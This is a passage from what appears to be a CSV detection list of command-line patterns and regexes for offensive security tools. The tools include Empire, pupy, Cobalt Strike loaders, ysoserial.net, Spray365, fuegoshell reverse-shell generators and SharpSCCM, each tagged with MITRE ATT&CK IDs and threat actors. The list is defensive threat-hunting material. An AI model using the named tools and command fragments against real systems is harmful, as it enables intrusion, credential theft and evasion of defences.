post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1259" "* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*",".{0,1000}\s\-\-functions\sNtProtectVirtualMemory.{0,1000}NtWriteVirtualMemory\s\-o\ssyscalls_mem.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","N/A","10","1414","180","2024-07-31T05:24:06Z","2022-03-07T18:56:21Z","1260" "* fuzz -u * -p 
*--target*",".{0,1000}\sfuzz\s\-u\s.{0,1000}\s\-p\s.{0,1000}\-\-target.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","1261" "* FUZZ:FUZZ *",".{0,1000}\sFUZZ\:FUZZ\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","1262" "* --fuzzers addition*",".{0,1000}\s\-\-fuzzers\saddition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1263" "* --fuzzers bitsquatting*",".{0,1000}\s\-\-fuzzers\sbitsquatting.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1264" "* --fuzzers cyrillic*",".{0,1000}\s\-\-fuzzers\scyrillic.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1265" "* --fuzzers dictionary*",".{0,1000}\s\-\-fuzzers\sdictionary.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1266" "* --fuzzers homoglyph*",".{0,1000}\s\-\-fuzzers\shomoglyph.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1267" "* --fuzzers hyphenation*",".{0,1000}\s\-\-fuzzers\shyphenation.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1268" "* --fuzzers insertion*",".{0,1000}\s\-\-fuzzers\sinsertion.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1269" "* --fuzzers omission*",".{0,1000}\s\-\-fuzzers\somission.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1270" "* --fuzzers repetition*",".{0,1000}\s\-\-fuzzers\srepetition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1271" "* --fuzzers replacement*",".{0,1000}\s\-\-fuzzers\sreplacement.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1272" "* --fuzzers subdomain*",".{0,1000}\s\-\-fuzzers\ssubdomain.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1273" "* --fuzzers transposition*",".{0,1000}\s\-\-fuzzers\stransposition.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1274" "* --fuzzers vowel-swap*",".{0,1000}\s\-\-fuzzers\svowel\-swap.{0,1000}","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. 
Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","N/A","3","10","5113","801","2025-04-15T18:41:47Z","2015-06-11T12:24:17Z","1275" "* FWUprank.ps1",".{0,1000}\sFWUprank\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","1276" "* -g ActivitySurrogateSelector*",".{0,1000}\s\-g\sActivitySurrogateSelector.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1277" "* -g ClaimsPrincipal *",".{0,1000}\s\-g\sClaimsPrincipal\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1278" "* -g -n --kerberoast*",".{0,1000}\s\-g\s\-n\s\-\-kerberoast.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory 
Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","1279" "* -g PSObject *",".{0,1000}\s\-g\sPSObject\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1280" "* -g TextFormattingRunProperties *",".{0,1000}\s\-g\sTextFormattingRunProperties\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1281" "* --gadget ActivitySurrogateSelector*",".{0,1000}\s\-\-gadget\sActivitySurrogateSelector.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1282" "* --gadget ClaimsPrincipal *",".{0,1000}\s\-\-gadget\sClaimsPrincipal\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1283" "* 
--gadget PSObject *",".{0,1000}\s\-\-gadget\sPSObject\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","1284" "* ganglia-info.nse*",".{0,1000}\sganglia\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1285" "* GC2-sheet*",".{0,1000}\sGC2\-sheet.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","0","N/A","N/A","10","10","578","111","2025-03-28T19:48:36Z","2021-09-15T19:06:12Z","1286" "* gcat.py -*",".{0,1000}\sgcat\.py\s\-.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","1287" "* gclient-build-image:latest *",".{0,1000}\sgclient\-build\-image\:latest\s.{0,1000}","offensive_tool_keyword","gTunnel","tunneling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","1288" "* gen -f client -O windows -A x64*",".{0,1000}\sgen\s\-f\sclient\s\-O\swindows\s\-A\sx64.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1289" "* gen -S -f client -O windows -A x64*",".{0,1000}\sgen\s\-S\s\-f\sclient\s\-O\swindows\s\-A\sx64.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1290" "* generate audit -ep 
*--passwords_in_userfile*",".{0,1000}\sgenerate\saudit\s\-ep\s.{0,1000}\-\-passwords_in_userfile.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","1291" "* generate normal -ep * -d * -u * -pf *",".{0,1000}\sgenerate\snormal\s\-ep\s.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-pf\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","1292" "* generate normal -ep ex-plan.s365 *",".{0,1000}\sgenerate\snormal\s\-ep\sex\-plan\.s365\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","1293" "* -generate -server * -setcradle bh.py*",".{0,1000}\s\-generate\s\-server\s.{0,1000}\s\-setcradle\sbh\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","1294" "* -generate -setcradle pythonmemorymodule.py*",".{0,1000}\s\-generate\s\-setcradle\spythonmemorymodule\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind 
spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","1295" "* generate_bind_fuegoshell.ps1*",".{0,1000}\sgenerate_bind_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","1296" "* generate_my_dll*",".{0,1000}\sgenerate_my_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/BokuLoader","1","0","N/A","N/A","10","10","1312","255","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z","1297" "* generate_reverse_fuegoshell.ps1*",".{0,1000}\sgenerate_reverse_fuegoshell\.ps1.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","1298" "* generatePayload*",".{0,1000}\sgeneratePayload.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","1299" "* --gen-relay-list *",".{0,1000}\s\-\-gen\-relay\-list\s.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1300" "* --gen-relay-list /tmp/relaylistOutputFilename.txt*",".{0,1000}\s\-\-gen\-relay\-list\s\/tmp\/relaylistOutputFilename\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","1301" "* get class-instances SMS_R_System *",".{0,1000}\sget\sclass\-instances\sSMS_R_System\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1302" "* get class-properties SMS_Admin*",".{0,1000}\sget\sclass\-properties\sSMS_Admin.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1303" "* get collection-members -n USERS*",".{0,1000}\sget\scollection\-members\s\-n\sUSERS.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","1304" "* get primary-users -u *",".{0,1000}\sget\sprimary\-users\s\-u\s.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
